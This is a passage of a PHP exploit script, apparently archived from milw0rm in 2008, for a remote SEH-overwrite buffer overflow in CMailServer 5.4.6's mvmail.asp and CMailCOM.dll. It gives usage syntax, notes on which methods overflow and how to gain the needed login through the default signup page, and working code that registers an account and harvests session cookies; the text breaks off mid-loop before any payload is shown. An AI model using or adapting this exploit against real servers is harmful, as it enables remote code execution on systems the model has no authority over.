0
	        strUID = arrString(i)
	        objPOP3.MoveToFolder strUID ' <---------------- bof
	  ...
	By attaching olly to the w3wp.exe sub-process you will see the usual
	dump with ecx and eip owned, with a buffer of approxymately 13000 chars.
        Exploitation is post-auth but you can have a user account by simply
	browsing the signup.asp page, enabled by default.
        Calc.exe will run with NETWORK SERVICE privilege, check tasks. Note
	that 4-5 failed exploit attempts may result in IIS "Service
	Unavailiable" message.
        Other attacks are possible, see a list of locally overflowable
        methods:
        CreateUserPath, Logout, DeleteMailByUID, MoveToInbox, MoveToFolder,
	DeleteMailEx,  GetMailDataEx, SetReplySign, SetForwardSign, SetReadSign.
	Note also that remotely there's some kind of validation (ex. you can
	not have a username with a length of more than 4000 chars which
	could be used instead to overflow the CreateUserPath method and
	you cannot overflow ex. through the strUID argument) which reduces a lot
	the remote vectors. However, as you can see there's no filter on
	"indexOfMail" one.
        Other notes:
        CMailCOM.SMTP class with CLSID 0609792F-AB56-4CB6-8909-19CDF72CB2A0
	is also vulnerable in the following methods:
        AddAttach, SetSubject, SetBcc, SetBody, SetCc, SetFrom,
        SetTo, SetFromUID
    */
        error_reporting(7);$host=$argv[1];$path=$argv[2];
        $argv[3] ? $port = (int) $argv[3] : $port = 80;
        print ("CMailServer 5.4.6 mvmail.asp/CMailCOM.dll remote seh overwrite\n".
               "exploit\n".
               "by Nine:Situations:Group::bookoo\n");
        $argv[2] ? print("attackin'...\n") : die ("syntax:  php ".$argv[0]." [host] [path] `port`\n".
	                                          "example: php ".$argv[0]." 192.168.0.1 /mail/    \n".
	                                          "   ''    php ".$argv[0]." 192.168.0.1 / 81      \n");
        $url = "http://$host:$port";
        $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
        $win ? dl("php_curl.dll") : dl("php_curl.so");
        //borrowed from bookoo
        function send($packet,$out)  {
            global $url, $data;
	    if (!extension_loaded("curl"){
		    die("you need the curl extesion loaded to run...");
            }
	    $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL,$url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            curl_setopt($ch, CURLOPT_HEADER, 1);
            curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $packet);
            $data = curl_exec($ch); if (curl_errno($ch)) {
                print curl_error($ch)."\n";
            } else {
               curl_close($ch);
            }
            if ($out) print($data."\n");
        }
        $agent="Mozilla/5.0 (Windows; U; Windows NT 5.2; it; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15";
        //subscribe
        $usr="bookoo";$pwd="password";//new usr username & password, change
	$d ="Signup=1&Account=$usr&Pass=$pwd&RePass=$pwd&UserName=&Comment=User&POP3Mail=%40ieqowieoqw.com";
        $h ="POST ".$path."signup.asp HTTP/1.0\r\nHost: $host\r\nUser-Agent: $agent\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($d)."\r\nConnection: Close\r\n\r\n$d";
	send($h,0);
	$tmp=explode("Set-Cookie: ",$data);
	for ($i=1; $i
# milw0rm.com [2008-07-06]